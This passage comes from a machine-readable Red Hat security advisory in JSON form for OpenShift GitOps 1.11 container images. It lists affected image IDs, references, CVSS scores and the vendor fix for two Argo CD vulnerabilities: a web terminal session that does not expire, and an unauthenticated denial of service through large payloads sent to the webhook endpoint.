"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-40025"
},
{
"category": "external",
"summary": "RHBZ#2301445",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301445"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-40025",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40025"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-40025",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-40025"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-c8xw-vjgf-94hr",
"url": "https://github.com/advisories/GHSA-c8xw-vjgf-94hr"
}
],
"release_date": "2023-08-24T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-08-01T10:48:26+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4972"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "argo-cd: Argo CD web terminal session doesn\u0027t expire"
},
{
"cve": "CVE-2024-40634",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2024-07-23T14:26:36+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2299473"
}
],
"notes": [
{
"category": "description",
"text": "A vulnerability was found in Argo CD. This flaw allows an unauthenticated attacker to send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation leading to service disruption by triggering an out-of-memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "argocd: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-40634"
},
{
"category": "external",
"summary": "RHBZ#2299473",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2299473"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-40634",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40634"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-40634",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40634"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w"
}
],
"release_date": "2024-07-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-08-01T10:48:26+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
